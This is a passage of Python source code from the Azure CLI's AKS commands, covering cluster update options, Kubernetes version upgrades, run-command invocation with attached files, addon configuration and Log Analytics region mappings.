load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and
not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
not no_uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub and
not windows_admin_password and
not enable_managed_identity and
not assign_identity):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--no-uptime-sla" or '
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--windows-admin-password" or '
'"--enable-managed-identity" or '
'"--assign-identity" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac"')
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
'to update per-node-pool autoscaler settings.')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if the intention is to clear the autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# otherwise a profile was provided; update the instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
'"--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using a service principal, and you are going to update '
'the cluster to use {} managed identity.\n After updating, your '
'cluster\'s control plane and addon pods will switch to use managed '
'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
'until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to '
'update the cluster to use {} managed identity. \nAre you sure you want to '
'perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
# pylint: disable=line-too-long
user_assigned_identity = {
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
'Linux'].enabled
return _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
None,
no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
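"""Upgrade the control plane and, unless --control-plane-only is given, all node pools.

With --node-image-only, only the node image of every node pool is upgraded
(VirtualMachineScaleSets clusters only).
"""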
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node image version, please use only the "--node-image-only" option.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This is a client-side convenience so customers can run "az aks upgrade" to upgrade all
# nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. A node-image-only upgrade '
'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
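"""Run a command inside the cluster via the AKS run-command API, attaching optional files.

Illustrative CLI invocation (names are placeholders):
    az aks command invoke -g MyResourceGroup -n MyCluster --command "kubectl get pods -A"
"""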
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# If this cluster has Azure AD enabled, we should pass the user token
# so that the command execution also uses the current user's identity.
# Here we acquire a token for the AKS managed server AppID (same ID for all clouds).
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains the list of parameter names the user typed, without values.
# CLI core also uses this to calculate the ParameterSetName header for all HTTP requests from the CLI.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# the user didn't specify a format, so we can customize the output for the best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
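"""Package the attached files (or the current folder for ".") into an in-memory zip
and return it base64-encoded, as expected by the run-command request context."""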
if not command_files:
return ""
filesToAttach = {}
# "." means attach the current folder; it cannot be combined with other files (at least for now).
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir()  # use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
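"""Enable or disable the requested addons on `instance` and return the updated model
(the caller is responsible for sending it back to the service)."""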
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addon argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
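"""Translate the --enable-addons argument into a dict of ManagedClusterAddonProfile objects,
raising on unrecognized addon names."""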
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
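"""Return the resource ID of the default Log Analytics workspace for the cluster's region,
creating the default resource group and workspace if they do not already exist."""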
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# currently log analytics is supported only in the China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
